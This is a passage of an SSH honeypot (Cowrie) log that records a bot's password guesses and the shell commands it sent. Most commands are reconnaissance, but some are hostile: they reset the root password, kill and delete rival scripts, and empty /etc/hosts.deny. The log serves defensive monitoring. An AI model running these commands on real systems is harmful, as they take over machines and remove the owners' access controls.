{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57188,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fbec18402a6","protocol":"ssh","message":"New connection: 212.227.235.229:57188 (1.2.3.4:22) [session: 5fbec18402a6]","sensor":"my-vps","timestamp":"2025-09-08T22:37:06.155410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:37:06.156179Z","src_ip":"212.227.235.229","session":"5fbec18402a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:37:06.476078Z","src_ip":"212.227.235.229","session":"5fbec18402a6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:06.766481Z","src_ip":"212.227.235.229","session":"3a70005670cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:07.046319Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:37:07.047017Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:37:07.048569Z","src_ip":"212.227.235.229","session":"fc4d25320cd9"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:07.050371Z","src_ip":"212.227.235.229","session":"fc4d25320cd9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:07.293787Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:07.806012Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"echo \"root:UTwXRf1OZ39P\"|chpasswd|bash","message":"CMD: echo \"root:UTwXRf1OZ39P\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T22:37:07.806715Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.login.failed","username":"clock","password":"clock","message":"login attempt [clock/clock] failed","sensor":"my-vps","timestamp":"2025-09-08T22:37:07.808653Z","src_ip":"212.227.235.229","session":"5fbec18402a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/916453f16e2014911b11d3f65dcb4dad894bb11d86b8d5bf2204d4f16c8f2a8b","size":21,"shasum":"916453f16e2014911b11d3f65dcb4dad894bb11d86b8d5bf2204d4f16c8f2a8b","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/916453f16e2014911b11d3f65dcb4dad894bb11d86b8d5bf2204d4f16c8f2a8b after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:08.055802Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:08.613352Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T22:37:08.614187Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T22:37:08.862979Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:08.863879Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:09.131265Z","src_ip":"212.227.235.229","session":"5fbec18402a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:09.379375Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T22:37:09.380293Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:09.629226Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:10.240694Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T22:37:10.241772Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:10.490340Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:11.040916Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T22:37:11.041594Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T22:37:11.042056Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:11.289457Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:11.799322Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T22:37:11.800181Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:12.046588Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:12.630001Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T22:37:12.630914Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:12.877659Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:13.425081Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T22:37:13.425797Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:13.672482Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:14.184089Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:37:14.184729Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:14.431607Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:15.025192Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T22:37:15.025906Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:15.273062Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:15.787126Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T22:37:15.787898Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:16.036071Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:16.626413Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T22:37:16.627209Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:16.873891Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:17.422962Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T22:37:17.423739Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:17.670182Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:18.179463Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T22:37:18.180330Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:18.427471Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:37:19.015192Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T22:37:19.015871Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:19.263446Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.closed","duration":"24.2","message":"Connection lost after 24.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:19.264586Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46312,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a9185f09031","protocol":"ssh","message":"New connection: 212.227.235.229:46312 (1.2.3.4:22) [session: 6a9185f09031]","sensor":"my-vps","timestamp":"2025-09-08T22:37:23.121488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:37:23.122756Z","src_ip":"212.227.235.229","session":"6a9185f09031"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:37:23.356257Z","src_ip":"212.227.235.229","session":"6a9185f09031"}
{"eventid":"cowrie.login.failed","username":"testing","password":"password123","message":"login attempt [testing/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:37:24.331776Z","src_ip":"212.227.235.229","session":"6a9185f09031"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:25.567751Z","src_ip":"212.227.235.229","session":"6a9185f09031"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56536,"dst_ip":"1.2.3.4","dst_port":22,"session":"64e6d06e14f7","protocol":"ssh","message":"New connection: 212.227.235.229:56536 (1.2.3.4:22) [session: 64e6d06e14f7]","sensor":"my-vps","timestamp":"2025-09-08T22:37:28.759925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:37:28.761249Z","src_ip":"212.227.235.229","session":"64e6d06e14f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:37:29.073164Z","src_ip":"212.227.235.229","session":"64e6d06e14f7"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps123","message":"login attempt [apps/apps123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:37:30.362262Z","src_ip":"212.227.235.229","session":"64e6d06e14f7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:31.677680Z","src_ip":"212.227.235.229","session":"64e6d06e14f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52630,"dst_ip":"1.2.3.4","dst_port":22,"session":"960ea6383318","protocol":"ssh","message":"New connection: 212.227.235.229:52630 (1.2.3.4:22) [session: 960ea6383318]","sensor":"my-vps","timestamp":"2025-09-08T22:37:33.958588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:37:33.959936Z","src_ip":"212.227.235.229","session":"960ea6383318"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-